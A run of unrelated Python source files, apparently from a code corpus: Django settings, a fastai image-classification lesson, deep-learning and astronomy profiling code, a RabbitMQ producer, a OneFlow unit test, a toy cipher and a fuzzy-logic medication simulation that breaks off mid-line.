'django.contrib.auth.password_validation.MinimumLengthValidator'}, {'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator'}, {'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator'}, ] # Internationalization LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) STATIC_URL = '/static/' STATIC_ROOT = '/var/www/static' MEDIA_URL = '/media/' MEDIA_ROOT = '/var/www/media' import operator from ..abc import SequenceExpression class ADD(SequenceExpression): """ Add all values from expressions. """ def __call__(self, context, event, *args, **kwargs): return self.reduce(operator.add, context, event, *args, **kwargs) class DIV(SequenceExpression): """ Divides values in expression """ def __call__(self, context, event, *args, **kwargs): return self.reduce(operator.truediv, context, event, *args, **kwargs) class MUL(SequenceExpression): """ Multiplies values in expression. """ def __call__(self, context, event, *args, **kwargs): return self.reduce(operator.mul, context, event, *args, **kwargs) class SUB(SequenceExpression): """ Subtracts values in expression """ def __call__(self, context, event, *args, **kwargs): return self.reduce(operator.sub, context, event, *args, **kwargs) class MOD(SequenceExpression): """ Modules values in expression. """ def __call__(self, context, event, *args, **kwargs): return self.reduce(operator.mod, context, event, *args, **kwargs) 10-100 import pygame from buffalo import utils from friendly import Friendly from trade import Trade from tradingUI import TradingUI from npc import NPC from camera import Camera # Extension of friendly NPCs, offers items in exchange for other items. Makes the # trade window appear when you click on him class Trader(Friendly): def __init__(self, **kwargs): self.trades = [Trade("axe"), Trade("potion")] Friendly.__init__(self, name=kwargs.get("name"), fPos=kwargs.get("fPos"), speed=kwargs.get("speed"), spawn=kwargs.get("spawn")) self.active = False self.tradeUI = None def update(self, inventory, manager): if self.tradeUI is None: self.tradeUI = TradingUI(inventory, self.trades) if pygame.mouse.get_pressed()[0] and not self.active: traderRect = pygame.Rect(self.pos, self.size) mousePos = pygame.mouse.get_pos() mousePos = (mousePos[0] + Camera.pos[0], mousePos[1] + Camera.pos[1]) if traderRect.collidepoint(mousePos): manager.active = True manager.registerGUI(self.tradeUI) self.active = True keys = pygame.key.get_pressed() if keys[pygame.K_e] and self.active: manager.deregisterGUI(self.tradeUI) self.active = False self.tradeUI = None# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.3' # jupytext_version: 0.8.6 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Lesson 1 - What's your pet # Welcome to lesson 1! For those of you who are using a Jupyter Notebook for the first time, you can learn about this useful tool in a tutorial we prepared specially for you; click `File`->`Open` now and click `00_notebook_tutorial.ipynb`. # # In this lesson we will build our first image classifier from scratch, and see if we can achieve world-class results. Let's dive in! # # Every notebook starts with the following three lines; they ensure that any edits to libraries you make are reloaded here automatically, and also that any charts or images displayed are shown in this notebook. # %reload_ext autoreload # %autoreload 2 # %matplotlib inline # We import all the necessary packages. We are going to work with the [fastai V1 library](http://www.fast.ai/2018/10/02/fastai-ai/) which sits on top of [Pytorch 1.0](https://hackernoon.com/pytorch-1-0-468332ba5163). The fastai library provides many useful functions that enable us to quickly and easily build neural networks and train our models. from fastai.vision import * from fastai.metrics import error_rate # If you're using a computer with an unusually small GPU, you may get an out of memory error when running this notebook. If this happens, click Kernel->Restart, uncomment the 2nd line below to use a smaller *batch size* (you'll learn all about what this means during the course), and try again. bs = 64 # bs = 16 # uncomment this line if you run out of memory even after clicking Kernel->Restart # ## Looking at the data # We are going to use the [Oxford-IIIT Pet Dataset](http://www.robots.ox.ac.uk/~vgg/data/pets/) by [ et al., 2012](http://www.robots.ox.ac.uk/~vgg/publications/2012/parkhi12a/parkhi12a.pdf) which features 12 cat breeds and 25 dogs breeds. Our model will need to learn to differentiate between these 37 distinct categories. According to their paper, the best accuracy they could get in 2012 was 59.21%, using a complex model that was specific to pet detection, with separate "Image", "Head", and "Body" models for the pet photos. Let's see how accurate we can be using deep learning! # # We are going to use the `untar_data` function to which we must pass a URL as an argument and which will download and extract the data. help(untar_data) # + #dataPath = '/Users/singhalmanik/Code/Courses/fast-ai/data' #d = pathlib.Path(dataPath) #d # - #path = untar_data(URLs.PETS, dest=d, force_download=True) path = untar_data(URLs.PETS) path #path = path/'oxford-iiit-pet' path.ls() path_anno = path/'annotations' path_img = path/'images' # The first thing we do when we approach a problem is to take a look at the data. We _always_ need to understand very well what the problem is and what the data looks like before we can figure out how to solve it. Taking a look at the data means understanding how the data directories are structured, what the labels are and what some sample images look like. # # The main difference between the handling of image classification datasets is the way labels are stored. In this particular dataset, labels are stored in the filenames themselves. We will need to extract them to be able to classify the images into the correct categories. Fortunately, the fastai library has a handy function made exactly for this, `ImageDataBunch.from_name_re` gets the labels from the filenames using a [regular expression](https://docs.python.org/3.6/library/re.html). fnames = get_image_files(path_img) fnames[:5] np.random.seed(2) pat = re.compile(r'/([^/]+)_\d+.jpg$') data = ImageDataBunch.from_name_re(path_img, fnames, pat, ds_tfms=get_transforms(), size=224, bs=bs ).normalize(imagenet_stats) data.show_batch(rows=4, figsize=(7,6)) print(data.classes) len(data.classes),data.c # ## Training: resnet34 # Now we will start training our model. We will use a [convolutional neural network](http://cs231n.github.io/convolutional-networks/) backbone and a fully connected head with a single hidden layer as a classifier. Don't know what these things mean? Not to worry, we will dive deeper in the coming lessons. For the moment you need to know that we are building a model which will take images as input and will output the predicted probability for each of the categories (in this case, it will have 37 outputs). # # We will train for 4 epochs (4 cycles through all our data). learn = create_cnn(data, models.resnet34, metrics=error_rate) learn.model learn.fit_one_cycle(4) learn.save('stage-1') # ## Results # Let's see what results we have got. # # We will first see which were the categories that the model most confused with one another. We will try to see if what the model predicted was reasonable or not. In this case the mistakes look reasonable (none of the mistakes seems obviously naive). This is an indicator that our classifier is working correctly. # # Furthermore, when we plot the confusion matrix, we can see that the distribution is heavily skewed: the model makes the same mistakes over and over again but it rarely confuses other categories. This suggests that it just finds it difficult to distinguish some specific categories between each other; this is normal behaviour. # + interp = ClassificationInterpretation.from_learner(learn) losses,idxs = interp.top_losses() len(data.valid_ds)==len(losses)==len(idxs) # - interp.plot_top_losses(9, figsize=(15,11)) doc(interp.plot_top_losses) interp.plot_confusion_matrix(figsize=(12,12), dpi=60) interp.most_confused(min_val=2) # ## Unfreezing, fine-tuning, and learning rates # Since our model is working as we expect it to, we will *unfreeze* our model and train some more. learn.unfreeze() learn.fit_one_cycle(1) learn.load('stage-1'); learn.lr_find() learn.recorder.plot() learn.unfreeze() learn.fit_one_cycle(2, max_lr=slice(1e-6,1e-4)) # That's a pretty accurate model! # ## Training: resnet50 # Now we will train in the same way as before but with one caveat: instead of using resnet34 as our backbone we will use resnet50 (resnet34 is a 34 layer residual network while resnet50 has 50 layers. It will be explained later in the course and you can learn the details in the [resnet paper](https://arxiv.org/pdf/1512.03385.pdf)). # # Basically, resnet50 usually performs better because it is a deeper network with more parameters. Let's see if we can achieve a higher performance here. To help it along, let's us use larger images too, since that way the network can see more detail. We reduce the batch size a bit since otherwise this larger network will require more GPU memory. data = ImageDataBunch.from_name_re(path_img, fnames, pat, ds_tfms=get_transforms(), size=299, bs=bs//2).normalize(imagenet_stats) learn = create_cnn(data, models.resnet50, metrics=error_rate) learn.lr_find() learn.recorder.plot() learn.fit_one_cycle(8) learn.save('stage-1-50') # It's astonishing that it's possible to recognize pet breeds so accurately! Let's see if full fine-tuning helps: learn.unfreeze() learn.fit_one_cycle(3, max_lr=slice(1e-6,1e-4)) # If it doesn't, you can always go back to your previous model. learn.load('stage-1-50'); interp = ClassificationInterpretation.from_learner(learn) interp.most_confused(min_val=2) # ## Other data formats path = untar_data(URLs.MNIST_SAMPLE); path tfms = get_transforms(do_flip=False) data = ImageDataBunch.from_folder(path, ds_tfms=tfms, size=26) data.show_batch(rows=3, figsize=(5,5)) learn = create_cnn(data, models.resnet18, metrics=accuracy) learn.fit(2) df = pd.read_csv(path/'labels.csv') df.head() data = ImageDataBunch.from_csv(path, ds_tfms=tfms, size=28) data.show_batch(rows=3, figsize=(5,5)) data.classes data = ImageDataBunch.from_df(path, df, ds_tfms=tfms, size=24) data.classes fn_paths = [path/name for name in df['name']]; fn_paths[:2] pat = r"/(\d)/\d+\.png$" data = ImageDataBunch.from_name_re(path, fn_paths, pat=pat, ds_tfms=tfms, size=24) data.classes data = ImageDataBunch.from_name_func(path, fn_paths, ds_tfms=tfms, size=24, label_func = lambda x: '3' if '/3/' in str(x) else '7') data.classes labels = [('3' if '/3/' in str(x) else '7') for x in fn_paths] labels[:5] data = ImageDataBunch.from_lists(path, fn_paths, labels=labels, ds_tfms=tfms, size=24) data.classes EmilPi/PuzzleLib import time import numpy as np from PuzzleLib.Backend import gpuarray from PuzzleLib.Containers.Sequential import Sequential from PuzzleLib.Containers.Parallel import Parallel from PuzzleLib.Modules.Embedder import Embedder from PuzzleLib.Modules.Reshape import Reshape from PuzzleLib.Modules.Replicate import Replicate from PuzzleLib.Modules.Conv2D import Conv2D from PuzzleLib.Modules.MaxPool2D import MaxPool2D from PuzzleLib.Modules.Concat import Concat from PuzzleLib.Modules.Activation import Activation, relu from PuzzleLib.Modules.Dropout import Dropout from PuzzleLib.Modules.Linear import Linear def buildBranch(fHeight, sentlength, branchMaps, embsize): seq = Sequential() seq.append(Conv2D(1, outmaps=branchMaps, size=(fHeight, embsize))) seq.append(MaxPool2D(size=(sentlength - fHeight + 1, 1))) seq.append(Reshape((-1, branchMaps))) return seq def buildNet(vocabulary, branches, w2v, sentlength, embsize, wscale, dim=2, branchMaps=100, name="sentinet"): def onVocabulary(W): W[0] = np.zeros((1, embsize), dtype=np.float32) arrayPOS = [ "", "_S", "_A", "_V", "_UNKN", "_ADJ", "_ADV", "_INTJ", "_NOUN", "_PROPN", "_VERB", "_ADP", "_AUX", "_CCONJ", "_DET", "_NUM", "_PART", "_PRON", "_SCONJ", "_SUM", "_X" ] tmpPOS = [] if not w2v: return for word in vocabulary: for pos in tmpPOS: if (word + pos) in w2v.vocab: W[vocabulary[word]] = w2v[word + pos] break for i, pos in enumerate(arrayPOS): if (word + pos) in w2v.vocab: tmpPOS.append(pos) W[vocabulary[word]] = w2v[word + pos] del arrayPOS[i] break net = Sequential(name) net.setAttr("timestamp", int(time.time())) net.append(Embedder( vocabulary, sentlength, embsize, wscale=wscale, onVocabulary=onVocabulary, learnable=True, name="embedder" )) net.append(Reshape((-1, 1, sentlength, embsize))) branchNum = len(branches) net.append(Replicate(times=branchNum)) par = Parallel() for branchFilterSize in branches: par.append(buildBranch(branchFilterSize, sentlength, branchMaps, embsize)) net.append(par) net.append(Concat(axis=1)) net.append(Activation(relu)) net.append(Dropout(p=0.5)) net.append(Linear(branchNum * branchMaps, dim)) return net def unittest(): vocabsize = 1000 sentlength, embsize = 100, 128 data = gpuarray.to_gpu(np.random.randint(0, vocabsize, (1, sentlength), dtype=np.int32)) senti = buildNet(vocabsize, (3, 5, 7), None, sentlength, embsize, 1.0) senti(data) del senti gpuarray.memoryPool.freeHeld() if __name__ == "__main__": unittest() ''' Created on Aug 23, 2012 @author: Chris ''' DIPLOMAT_INCOME = "Diplomatic Relations" SITE_INCOME = "Sites" ITEM_INCOME = "Items" UNIT_MAINT = "Unit Maintenance" INCOME_TYPES = {SITE_INCOME, UNIT_MAINT, DIPLOMAT_INCOME, ITEM_INCOME}vivainio/zipgetzipget/__main__.py from . import zipget zipget.main() AshKelly/PyAutoLens import time from autolens.model.profiles import light_profiles as lp from autolens.data.array import mask as msk from autolens.lens import lens_data as ld from test.profiling import tools # Although we could test the intensities without using an image (e.g. by just making a grid), we have chosen to # set this test up using an image and mask. This gives run-time numbers that can be easily related to an actual lens # analysis sub_grid_size = 4 radius_arcsec = 3.0 print('sub grid size = ' + str(sub_grid_size)) print('circular mask radius = ' + str(radius_arcsec) + '\n') for image_type in ['LSST', 'Euclid', 'HST', 'HST_Up', 'AO']: ccd_data = tools.load_profiling_ccd_data(image_type=image_type, lens_name='no_lens_source_smooth', psf_shape=(3,3)) mask = msk.Mask.circular(shape=ccd_data.shape, pixel_scale=ccd_data.pixel_scale, radius_arcsec=radius_arcsec) lens_data = ld.LensData(ccd_data=ccd_data, mask=mask, sub_grid_size=sub_grid_size) print('Deflection angle run times for image type ' + image_type + '\n') print('Number of points = ' + str(lens_data.grid_stack.sub.shape[0]) + '\n') ### EllipticalGaussian ### mass_profile = lp.EllipticalGaussian(centre=(0.0, 0.0), axis_ratio=0.8, phi=45.0, sigma=1.0) start = time.time() mass_profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("EllipticalGaussian time = {}".format(diff)) ### SphericalGaussian ### mass_profile = lp.SphericalGaussian(centre=(0.0, 0.0), sigma=1.0) start = time.time() mass_profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("SphericalGaussian time = {}".format(diff)) ### EllipticalExponential ### profile = lp.EllipticalExponential(centre=(0.0, 0.0), axis_ratio=0.8, phi=45.0, intensity=1.0, effective_radius=1.0) start = time.time() profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("EllipticalExponential time = {}".format(diff)) ### SphericalExponential ### profile = lp.SphericalExponential(centre=(0.0, 0.0), intensity=1.0, effective_radius=1.0) start = time.time() profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("SphericalExponential time = {}".format(diff)) ### EllipticalDevVaucouleurs ### profile = lp.EllipticalDevVaucouleurs(centre=(0.0, 0.0), axis_ratio=0.8, phi=45.0, intensity=1.0, effective_radius=1.0) start = time.time() profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("EllipticalDevVaucouleurs time = {}".format(diff)) ### SphericalDevVaucouleurs ### profile = lp.SphericalDevVaucouleurs(centre=(0.0, 0.0), intensity=1.0, effective_radius=1.0) start = time.time() profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("SphericalDevVaucouleurs time = {}".format(diff)) ### EllipticalSersic ### mass_profile = lp.EllipticalSersic(centre=(0.0, 0.0), axis_ratio=0.8, phi=45.0, intensity=1.0, effective_radius=1.0, sersic_index=2.5) start = time.time() mass_profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("EllipticalSersic time = {}".format(diff)) ### SphericalSersic ### mass_profile = lp.SphericalSersic(centre=(0.0, 0.0), intensity=1.0, effective_radius=1.0, sersic_index=2.5) start = time.time() mass_profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("SphericalSersic time = {}".format(diff)) ### EllipticalCoreSersic ### mass_profile = lp.EllipticalCoreSersic(centre=(0.0, 0.0), axis_ratio=0.8, phi=45.0, intensity=1.0, effective_radius=1.0, sersic_index=2.5, radius_break=0.01, intensity_break=0.05, gamma=0.25, alpha=3.0) start = time.time() mass_profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("EllipticalCoreSersic time = {}".format(diff)) ### SphericalCoreSersic ### mass_profile = lp.SphericalCoreSersic(centre=(0.0, 0.0), intensity=1.0, effective_radius=1.0, sersic_index=2.5, radius_break=0.01, intensity_break=0.05, gamma=0.25, alpha=3.0) start = time.time() mass_profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("SphericalCoreSersic time = {}".format(diff)) print()def notas(* n, sit=False): ''' -> Função para analisar notas e situações de vários alunos. :param n: uma ou mais notas dos alunos (aceita várias) :param sit: valor opcional, indicando se deve ou não adicionar a situação :return: dicionário com várias informações sobre a situação da turma. ''' print('-'*30) tupla = {} maior = menor = soma = 0 tupla['total'] = len(n) for i in n: if maior == 0 or i > maior: maior = i if menor == 0 or i < menor: menor = i soma += i tupla['maior'] = maior tupla['menor'] = menor media = soma / len(n) ''' tupla["maior"] = max(n) tupla["menor"] = min(n) media= sum(n) / len(n) ''' tupla['média'] = media if sit: if media < 4.9: res = 'RUIM' elif media < 6.9: res = 'RAZOAVEL' elif media <= 10: res = 'BOA' tupla['situação'] = res return tupla resp = notas(3.5, 2, 6.5, 2, 7, 4, sit=True) print(resp) #!/usr/bin/env python # Compare som.py stats.csv and hap.py extended.csv files import sys import argparse import csv import pprint as pp import re import logging logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s', level=logging.INFO) def parse_args(): parser = argparse.ArgumentParser("Validate hap.py stats") parser.add_argument("--sompy_stats", required=True, help="Path to som.py stats.csv") parser.add_argument("--happy_extended", required=True, help="Path to hap.py extended.csv") args = parser.parse_args() return args def eval_equal(metric_name, count_a, count_b): a = int(count_a) b = int(count_b) e = "PASS" if a == b else "FAIL" logging.info("%s: %d vs %d - %s" % (metric_name, a, b, e)) return e def parse_sompy_stats(path): sompy_stats = csv.DictReader(open(path)) result = dict() for s in sompy_stats: subset = s["type"] if re.match("indels.", subset): # store results per af_bin m = re.findall("indels.(\d+\.\d+)-(\d+\.\d+)", subset)[0] af_low = m[0][:4] af_high = m[1][:4] af_bin = "[%s,%s]" % (af_low, af_high) if af_low == "1.00" else "[%s,%s)" % (af_low, af_high) result["INDEL." + af_bin] = s if re.match("SNVs.", subset): # store results per af_bin m = re.findall("SNVs.(\d+\.\d+)-(\d+\.\d+)", subset)[0] af_low = m[0][:4] af_high = m[1][:4] af_bin = "[%s,%s]" % (af_low, af_high) if af_low == "1.00" else "[%s,%s)" % (af_low, af_high) result["SNP." + af_bin] = s return result if __name__ == '__main__': args = parse_args() sompy_stats = parse_sompy_stats(path=args.sompy_stats) happy_extended = csv.DictReader(open(args.happy_extended)) outcomes = dict(ALL=set(), PASS=set()) for h in happy_extended: k = h["Type"] + "." + h["Subset"] try: s = sompy_stats[k] except KeyError: s = {"total.truth": 0, "tp": 0, "fn": 0, "total.query": 0, "fp": 0, "unk": 0} outcomes[h["Filter"]].add(eval_equal(metric_name="%s %s TRUTH.TOTAL" % (k, h["Filter"]), count_a=s["total.truth"], count_b=h["TRUTH.TOTAL"])) outcomes[h["Filter"]].add(eval_equal(metric_name="%s %s TRUTH.TP" % (k, h["Filter"]), count_a=s["tp"], count_b=h["TRUTH.TP"])) outcomes[h["Filter"]].add(eval_equal(metric_name="%s %s TRUTH.FN" % (k, h["Filter"]), count_a=s["fn"], count_b=h["TRUTH.FN"])) outcomes[h["Filter"]].add(eval_equal(metric_name="%s %s QUERY.TOTAL" % (k, h["Filter"]), count_a=s["total.query"], count_b=h["QUERY.TOTAL"])) outcomes[h["Filter"]].add(eval_equal(metric_name="%s %s QUERY.FP" % (k, h["Filter"]), count_a=s["fp"], count_b=h["QUERY.FP"])) outcomes[h["Filter"]].add(eval_equal(metric_name="%s %s QUERY.UNK" % (k, h["Filter"]), count_a=int(s["unk"])+int(s["ambi"]), count_b=h["QUERY.UNK"])) failed_vfilters = [x for x in outcomes if "FAIL" in outcomes[x]] if len(failed_vfilters) == 2: logging.info("Failed filters: %s" % failed_vfilters) sys.exit(1) else: logging.info("DONE") rabbitmq-cluster/src/x_producer.py #-*-coding=utf-8-*- import sys import socket import time from kombu import Connection, Exchange, Queue, Producer import config def run(rabbit_url): print rabbit_url conn = Connection(rabbit_url) conn.ensure_connection() conn.connect() channel = conn.channel() exchange = Exchange(config.EXCHANGE_NAME, type='direct') producer = Producer(exchange=exchange, channel=channel, routing_key=config.ROUTING_KEY) queue = Queue(name=config.QUEUE_NAME, exchange=exchange, routing_key=config.ROUTING_KEY) queue.maybe_bind(conn) queue.declare() index = 0 while True: try: time.sleep(1) print 'producer' index += 1 producer.publish("send message -- %s" % index) except socket.timeout: pass if __name__ == "__main__": print 'python x_producer "amqp://localhost:5672/;amqp://localhost:5672/"' if len(sys.argv) > 1: rabbit_url = sys.argv[1] else: rabbit_url = config.RABBIT_URL run(rabbit_url) from m5.params import * from m5.SimObject import SimObject class MulticastScoreboard(SimObject): type = 'MulticastScoreboard' cxx_class = 'MulticastScoreboard' cxx_header = "mem/ruby/structures/MulticastScoreboard.hh" 1-10 """ Copyright 2020 The OneFlow Authors. All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import unittest import os from collections import OrderedDict import numpy as np import oneflow as flow import test_global_storage from test_util import GenArgList, type_name_to_flow_type def compare_with_not_fused( test_case, device_type, x_shape, data_type, diagonal, fill_value, scale, rate, seed ): assert device_type in ["gpu", "cpu"] flow.clear_default_session() func_config = flow.FunctionConfig() if data_type == "float16": dtype = flow.float else: dtype = type_name_to_flow_type[data_type] @flow.global_function(type="train", function_config=func_config) def test_fused_scale_tril_softmax_dropout_fw_bw_job(): with flow.scope.placement(device_type, "0:0"): x = flow.get_variable( "x", shape=x_shape, dtype=dtype, initializer=flow.random_uniform_initializer(minval=-1.0, maxval=1.0), trainable=True, ) flow.watch(x, test_global_storage.Setter("x")) x1 = flow.identity(x) x2 = flow.identity(x) flow.watch_diff(x1, test_global_storage.Setter("x1_diff")) flow.watch_diff(x2, test_global_storage.Setter("x2_diff")) if data_type == "float16": y1 = flow.cast( flow.nn.dropout( flow.nn.softmax( flow.math.fused_scale_tril( flow.cast(x1, dtype=flow.float16), diagonal=diagonal, fill_value=fill_value, scale=scale, ), ), rate=rate, seed=seed, name="dropout", ), dtype=flow.float, ) y2 = flow.cast( flow.nn.fused_scale_tril_softmax_dropout( flow.cast(x2, dtype=flow.float16), diagonal=diagonal, fill_value=fill_value, scale=scale, rate=rate, seed=seed, ), dtype=flow.float, ) else: y1 = flow.nn.dropout( flow.nn.softmax( flow.math.fused_scale_tril( x1, diagonal=diagonal, fill_value=fill_value, scale=scale ) ), rate=rate, seed=seed, name="dropout", ) y2 = flow.nn.fused_scale_tril_softmax_dropout( x2, diagonal=diagonal, fill_value=fill_value, scale=scale, rate=rate, seed=seed, ) flow.watch(y1, test_global_storage.Setter("y1")) flow.watch(y2, test_global_storage.Setter("y2")) flow.watch_diff(y1, test_global_storage.Setter("y1_diff")) flow.watch_diff(y2, test_global_storage.Setter("y2_diff")) loss = y1 + y2 total_loss = loss * x flow.optimizer.SGD( flow.optimizer.PiecewiseConstantScheduler([], [0.001]), momentum=0 ).minimize(flow.math.reduce_sum(total_loss)) return loss of_out = test_fused_scale_tril_softmax_dropout_fw_bw_job().get() y1 = test_global_storage.Get("y1") y2 = test_global_storage.Get("y2") tol = 1e-3 if data_type == "float16" else 1e-5 test_case.assertTrue(np.allclose(y1, y2, rtol=tol, atol=tol, equal_nan=True)) x1_diff = test_global_storage.Get("x1_diff") x2_diff = test_global_storage.Get("x2_diff") test_case.assertTrue( np.allclose(x1_diff, x2_diff, rtol=tol, atol=tol, equal_nan=True) ) @flow.unittest.skip_unless_1n1d() class TestFusedScaleTrilSoftmaxDropout(flow.unittest.TestCase): @unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases") def test_fused_scale_tril_softmax_dropout(test_case): arg_dict = OrderedDict() arg_dict["device_type"] = ["gpu"] arg_dict["x_shape"] = [ (2, 2, 5, 5), (10, 20), (32, 12, 128), (10, 960), ] arg_dict["data_type"] = ["float16", "float32", "double"] arg_dict["diagonal"] = [-1, 0] arg_dict["fill_value"] = [float("-inf"), 0] arg_dict["scale"] = [0.125] arg_dict["rate"] = [0.5] arg_dict["seed"] = [12345] for arg in GenArgList(arg_dict): if arg[0] == "cpu" and arg[2] == "float16": continue compare_with_not_fused(test_case, *arg) if __name__ == "__main__": unittest.main() karamolegkos/Diastema-Testorchestrator/pb_check.py1-10 # Function to check if a Diastema Playbook is Valid def playbook_check(playbook, diastema_token): """ A set of rules. Returns True is Playbook is ok. Or False if there is a problem in the playbook. """ if playbook is None: print("[ERROR] No Diastema playbook given!") return (False, "No Diastema playbook given!") if not ("diastema-token" in playbook): print("[ERROR] No Diastema Token given!") return (False, "No Diastema Token given!") if playbook["diastema-token"] != diastema_token: print("[ERROR] Invalid Diastema Token!") return (False, "Invalid Diastema Token!") # More rules can be added here return (True, "Valid playbook")NosicLin/Faeris0 from LuaCompiler import LuaCompiler keyorder.py #!/usr/bin/env python import sys import re import cryptutils from string import ascii_uppercase import optparse import copy from pi import PiGenerator import math class KeyOrder(object): KEYLENGTH = 20 key = None extras = '., "&?' #extra characters we can use because we need to fill up 5 bits letters = ascii_uppercase+extras rdict = dict(zip(range(0,32),letters)) fdict = dict(zip(letters,range(0,32))) def __init__(self,key): key = cryptutils.convertInput(key,['upper','nospace','charonly']) if len(key) < self.KEYLENGTH: raise ValueError,'Key Length must be %i characters or more.' % (self.KEYLENGTH) self.key = self.orderKey(key[0:self.KEYLENGTH]) def orderKey(self,key): sk = sorted(key) ik = [-1 for x in range(0,len(key))] alreadyseen = ''; for i in range(0,len(key)): ch = key[i] idx = sk.index(ch) ik[i] = idx sk[idx] = '0' return ik def getBitString(self,numbers): bitstring = '' for n in numbers: bitstring = bitstring + str(n % 2) return bitstring def scrambleKey(self,newmessage): nchars = len(newmessage) P = nchars * 5 if P % 20: Q = P / 20.0 P = int(math.ceil(Q)*20) pi = PiGenerator(P) scrambled = [] for i in range(0,P/20): pstart = i*20 pend = pstart + 20 pd = pi.digits[pstart:pend] s = [(pd[i] + self.key[i])%10 for i in range(0,20)] scrambled = scrambled + s for i in range(0,10): scrambled = self.shuffle(scrambled) return self.shuffle(scrambled) def shuffle(self,scrambled): newscramble = [0 for i in scrambled] n = len(newscramble) nchunks = n/10 key1 = [] key2 = [] for k in self.key: if k < 10: key1.append(k) else: key2.append(k-10) for i in range(0,nchunks/2): i1 = i*10 i2 = i1+10 block1 = scrambled[i1:i2] i3 = (nchunks-(i+1))*10 i4 = i3+10 block2 = scrambled[i3:i4] for j in range(0,10): k1 = key1[j] k2 = key2[j] newscramble[i1+j] = block2[k2] newscramble[i3+j] = block1[k1] return newscramble def encrypt(self,message): newmessage = '' ciphertext = '' bitstring = '' for m in message.upper(): if m in self.letters: newmessage = newmessage + m scrambled = self.scrambleKey(newmessage) nchars = len(newmessage) nchunks = int(math.ceil(nchars/20.0)) for ichunk in range(nchunks): #print 'Chunk %i' % ichunk istart = ichunk*20 iend = istart + 20 if iend > len(newmessage)-1: chunk = newmessage[istart:] else: chunk = newmessage[istart:istart+20] for i in range(0,len(chunk)): if len(chunk) < len(self.key): kidx = i else: kidx = self.key[i] ch = chunk[kidx] numch = self.fdict[ch] pstart = ichunk*20 + kidx*5 pend = pstart + 5 piblock = scrambled[pstart:pend] pibits = cryptutils.list2bin(piblock) pinum = cryptutils.bin2dec(pibits) bitstring = bitstring + self.rdict[pinum] numct = numch ^ pinum ciphertext = ciphertext + self.rdict[numct] #print '%2i %2i %2s %2i %4i %4i %-20s %2i %2i %s' % (i,kidx,ch,numch,pstart,pend,str(piblock),pinum,numct,ciphertext[-1]) return (ciphertext,bitstring) def decrypt(self,ciphertext): newciphertext = '' plaintext = [0 for c in ciphertext] bitstring = '' for m in ciphertext.upper(): if m in self.letters: newciphertext = newciphertext + m scrambled = self.scrambleKey(newciphertext) nchars = len(newciphertext) nchunks = int(math.ceil(nchars/20.0)) for ichunk in range(nchunks): istart = ichunk*20 chunk = newciphertext[istart:istart+20] for i in range(0,len(chunk)): if len(chunk) < len(self.key): kidx = i else: kidx = self.key[i] ch = chunk[i] numch = self.fdict[ch] pstart = ichunk*20 + kidx*5 pend = pstart + 5 piblock = scrambled[pstart:pend] pibits = cryptutils.list2bin(piblock) pinum = cryptutils.bin2dec(pibits) bitstring = bitstring + self.rdict[pinum] numct = numch ^ pinum plaintext[istart+kidx] = self.rdict[numct] plaintext = ''.join(plaintext) return (plaintext,bitstring) if __name__ == '__main__': usage = 'usage: %prog [options] plain/ciphertext' parser = optparse.OptionParser(usage=usage) parser.add_option("-k", "--key", dest="key", help="set key for encryption/decryption", metavar="KEY") parser.add_option("-e", "--encrypt", dest="doEncrypt", action="store_true",default=False) parser.add_option("-d", "--decrypt", dest="doDecrypt", action="store_true",default=False) parser.add_option("-b", "--genbits", dest="doGenBits", action="store_true",default=False) (options, args) = parser.parse_args() if options.key is None or len(args) == 0: print 'Specify a key with -k and supply a message to encrypt/decrypt.' parser.print_help() sys.exit(1) if options.doEncrypt and options.doDecrypt: print 'You must select one of encryption or decryption.' parser.print_help() sys.exit(1) message = ' '.join(args) try: k = KeyOrder(options.key) except ValueError,msg: print msg parser.print_help() sys.exit(1) if options.doEncrypt: ct,bitstring = k.encrypt(message) print "'%s'" % ct if options.doGenBits: print "'%s'" % bitstring if options.doDecrypt: print k.decrypt(message) if options.doGenBits: ct,bitstring = k.encrypt(message) print "'%s'" % bitstring from FuzzyEngine.rule import Rule from Simulation.environment import Environment from random import random def dipirona_action(time: int, env: Environment) -> list[Rule]: r = random() actions_rules = [] if r < 0.7: if env.get_parameter('temperatura') != None and env.get_parameter('temperatura').value>37: actions_rules.append(Rule( {'temperatura':'media'}, destination='temperatura', then=('decrease','low'))) actions_rules.append(Rule( {'temperatura':'alta'}, destination='temperatura', then=('decrease','medium'))) actions_rules.append(Rule( {'temperatura':'muy alta'}, destination='temperatura', then=('decrease','high'))) return actions_rules def calbamol_action(time: int, env: Environment) -> list[Rule]: r = random() actions_rules = [] if r < 1: if env.get_parameter('temperatura') != None and env.get_parameter('temperatura').value>38: actions_rules.append(Rule( {'temperatura':'baja'}, destination='temperatura', then=('decrease','low'))) actions_rules.append(Rule( {'temperatura':'media'}, destination='temperatura', then=('decrease','low'))) actions_rules.append(Rule( {'temperatura':'alta'}, destination='temperatura', then=('decrease','high'))) actions_rules.append(Rule( {'temperatura':'muy alta'}, destination='temperatura', then=('decrease','high'))) if env.get_parameter('plaqueta') != None and env.get_parameter('plaqueta').value<=10: actions_rules.append(Rule( 